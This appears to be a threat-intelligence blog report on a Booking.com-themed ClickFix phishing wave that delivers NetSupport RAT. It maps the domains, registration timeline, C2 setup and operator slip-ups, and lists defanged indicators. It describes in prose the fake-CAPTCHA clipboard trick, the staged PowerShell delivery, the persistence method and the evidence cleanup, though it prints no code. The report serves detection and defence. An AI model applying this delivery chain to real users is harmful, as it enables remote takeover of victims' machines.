BreakglassIntelligence
Back to reports

Same Campaign, Fresh Infrastructure: Mapping the Latest Booking.com ClickFix Wave Delivering NetSupport RAT

Seven-day infrastructure standup, Chinese/HK batch domain registration, dual C2 gateways, and two OPSEC artifacts

PublishedApril 3, 2026

Booking.com phishing campaigns delivering NetSupport RAT via ClickFix fake CAPTCHAs are not new. Securonix has tracked them. Multiple vendors have published detections. The technique -- trick the victim into pasting a PowerShell command via a fake browser verification -- has been documented extensively.

What changes with each wave is the infrastructure. And the infrastructure from this week's wave, flagged by @JAMESWT_WT, was stood up in seven days, registered through Chinese and Hong Kong registrars in batch transactions, and left two OPSEC artifacts that fingerprint the operator's development environment.

This Wave's Chain

Stage 1 -- ClickFix at secure-extranet[.]com/captcha/

A Booking.com-branded fake CAPTCHA page. The page copies a PowerShell command to the victim's clipboard and instructs them to press Win+R, Ctrl+V, Enter. Standard ClickFix technique -- the victim executes the malware themselves, bypassing email attachment scanning, download warnings, and Mark-of-the-Web protections.

Stage 2 -- Redirect via jskeowgo[.]com (77.91.97[.]92)

The clipboard PowerShell calls jskeowgo[.]com, which returns a command that opens the real booking.com in the victim's browser -- maintaining the social engineering illusion -- while silently downloading Stage 3 in the background.

Stage 3 -- NetSupport RAT from 77[.]91[.]97[.]92/032.txt

A 9.4 MB PowerShell script containing 14 base64-encoded files that constitute a complete NetSupport Manager RAT deployment:

  • Creates a hidden folder on the Desktop
  • Writes all 14 RAT components
  • Creates a Startup folder LNK for persistence
  • Cleans the Run MRU registry key to remove evidence of the Win+R execution

The RAT connects to dual C2 gateways: asfasfqwf[.]com:443 (primary, not yet resolving) and asdasfa[.]com:443 (secondary, resolving to 5[.]188[.]87[.]49). Configuration: full stealth mode, no UI, no tray icon, 9999 maximum concurrent victims.

Infrastructure Timeline

Everything was registered in a seven-day window:

DateEvent
Mar 25jskeowgo[.]com registered (CNOBIN, Beijing)
Mar 30secure-extranet[.]com registered (NICENIC, Hong Kong)
Apr 1asdasfa[.]com registered (NICENIC, sequential Registry ID)
Apr 1asfasfqwf[.]com registered (NICENIC, sequential Registry ID)
Apr 2C2 active, payload serving confirmed

All four domains were registered through Chinese and Hong Kong registrars (CNOBIN International Technology, NICENIC International Group) with sequential IANA Registry IDs -- indicating batch registration in a single transaction. This is a procurement pattern, not coincidence.

OPSEC Failures

Two artifacts fingerprint the operator:

  1. RDP certificate on the C2 at 5[.]188[.]87[.]49 leaks hostname WIN-FLJTJKL01VM -- the operator's Windows machine name, exposed because they enabled RDP on their C2 server without replacing the default self-signed certificate.

  2. PDB path in the NetSupport client configuration references C:\Users\Administrator\Desktop\HTCTL32\ -- the operator built or configured the RAT payload from an Administrator desktop, and the path leaked into the deployment configuration.

Neither artifact is sufficient for attribution, but both are useful for linking future infrastructure to this same operator.

What's Different From Prior Waves

AspectPrior Documented WavesThis Wave
RegistrarsVariousChinese/HK batch registration (CNOBIN, NICENIC)
C2 configSingle gatewayDual gateway with failover
Payload deliveryDirect download3-stage with real booking.com redirect as cover
Stage 3 sizeVaries9.4 MB (14 files, all base64-encoded in one script)
PersistenceVariousStartup folder LNK + MRU cleanup
Max victimsVaries9999 (configured in client32.ini)

Indicators of Compromise

Network Indicators

  • secure-extranet[.]com (ClickFix lure)
  • jskeowgo[.]com / 77[.]91[.]97[.]92 (Stage 2 redirect)
  • asfasfqwf[.]com:443 (NetSupport C2 primary)
  • asdasfa[.]com:443 / 5[.]188[.]87[.]49 (NetSupport C2 secondary)

Host Indicators

  • Hidden Desktop folder containing NetSupport RAT files
  • Startup folder LNK pointing to client32.exe
  • Run MRU registry key cleaned post-execution
  • C2 hostname: WIN-FLJTJKL01VM

Detection

Five YARA rules and ten Suricata signatures are available on our GitHub:

h/t @JAMESWT_WT for flagging this wave.

Share